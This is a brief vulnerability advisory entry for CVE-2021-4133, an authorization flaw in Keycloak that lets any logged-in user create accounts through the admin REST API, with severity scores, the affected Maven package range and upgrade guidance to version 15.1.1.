CVE-2021-4133
Improper Authorization in Keycloak
8.8
HIGH
CVSS 3.1
EPSS 0.43%
Description
A incorrect authorization flaw was found in Keycloak 12.0.0, the flaw allows an attacker with any existing user account to create new default user accounts via the administrative REST API even where new user registration is disabled.
How to fix CVE-2021-4133
To remediate CVE-2021-4133, upgrade the affected package to a fixed version below.
- Maven/org.keycloak:keycloak-services—upgrade to 15.1.1 or later
Is CVE-2021-4133 being exploited?
Low — EPSS is 0.4%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- from 0, < 15.1.1
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH8.8 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |